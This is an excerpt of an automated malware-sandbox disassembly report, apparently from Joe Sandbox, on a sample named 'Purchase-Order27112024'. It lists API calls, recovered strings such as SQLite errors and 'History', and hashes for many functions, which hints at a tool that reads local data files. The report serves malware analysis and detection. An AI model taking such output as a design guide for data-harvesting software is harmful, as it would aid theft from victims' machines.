                                                                                                      • Opcode Fuzzy Hash: f8fc55ba245d1c9f6a3ba6cb2a4711690556c3657263a09b0baeb8372baa9e99
                                                                                                      • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004116FF
                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                        • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                      • API String ID: 2618321458-3614832568
                                                                                                      • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                      • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                      • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                      • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFilefreememset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2507021081-0
                                                                                                      • Opcode ID: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                                      • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                      • Opcode Fuzzy Hash: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                                      • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                      APIs
                                                                                                      • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                      • malloc.MSVCRT ref: 00417524
                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                      • free.MSVCRT ref: 00417544
                                                                                                      • free.MSVCRT ref: 00417562
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 4131324427-0
                                                                                                      APIs
                                                                                                      • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                      • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                      • free.MSVCRT ref: 0041822B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PathTemp$free
                                                                                                      • String ID: %s\etilqs_$etilqs_
                                                                                                      • API String ID: 924794160-1420421710
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040FDD5
                                                                                                        • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,<,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                      • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                      • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                      • API String ID: 1775345501-2769808009
                                                                                                      APIs
                                                                                                      • wcscpy.MSVCRT ref: 0041477F
                                                                                                      • wcscpy.MSVCRT ref: 0041479A
                                                                                                      • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: wcscpy$CloseCreateFileHandle
                                                                                                      • String ID: General
                                                                                                      • API String ID: 999786162-26480598
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                      • _snwprintf.MSVCRT ref: 0040977D
                                                                                                      • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastMessage_snwprintf
                                                                                                      • String ID: Error$Error %d: %s
                                                                                                      • API String ID: 313946961-1552265934
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: foreign key constraint failed$new$oid$old
                                                                                                      • API String ID: 0-1953309616
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                      • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                      • API String ID: 3510742995-272990098
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0044A6EB
                                                                                                      • memset.MSVCRT ref: 0044A6FB
                                                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset
                                                                                                      • String ID: gj
                                                                                                      • API String ID: 1297977491-4203073231
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                                                                                      • free.MSVCRT ref: 0040E9D3
                                                                                                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??3@$free
                                                                                                      • String ID:
                                                                                                      • API String ID: 2241099983-0
                                                                                                      APIs
                                                                                                      • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                      • malloc.MSVCRT ref: 004174BD
                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                      • free.MSVCRT ref: 004174E4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 4053608372-0
                                                                                                      • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                      • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                      • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                      • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                      APIs
                                                                                                      • GetParent.USER32(?), ref: 0040D453
                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                      • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Rect$ClientParentPoints
                                                                                                      • String ID:
                                                                                                      • API String ID: 4247780290-0
                                                                                                      • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                      • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                      • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                      • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                      APIs
                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                      • memset.MSVCRT ref: 004450CD
                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                        • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 1471605966-0
                                                                                                      • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                      • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                      • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                      • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                      APIs
                                                                                                      • wcscpy.MSVCRT ref: 0044475F
                                                                                                      • wcscat.MSVCRT ref: 0044476E
                                                                                                      • wcscat.MSVCRT ref: 0044477F
                                                                                                      • wcscat.MSVCRT ref: 0044478E
                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                        • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                        • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                      • String ID: \StringFileInfo\
                                                                                                      • API String ID: 102104167-2245444037
                                                                                                      • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                      • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                      • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                      • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                      APIs
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??3@
                                                                                                      • String ID:
                                                                                                      • API String ID: 613200358-0
                                                                                                      • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                      • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                      • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                      • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                      APIs
                                                                                                      • GetSystemMetrics.USER32(00000000), ref: 00401990
                                                                                                      • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                                                                                      • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MetricsSystem$PlacementWindow
                                                                                                      • String ID: AE
                                                                                                      • API String ID: 3548547718-685266089
                                                                                                      • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                      • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                                                                                      • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                      • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _memicmpwcslen
                                                                                                      • String ID: @@@@$History
                                                                                                      • API String ID: 1872909662-685208920
                                                                                                      • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                      • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                      • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                      • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004100FB
                                                                                                      • memset.MSVCRT ref: 00410112
                                                                                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                      • _snwprintf.MSVCRT ref: 00410141
                                                                                                      Strings
                                                                                                      Memory Dump Source
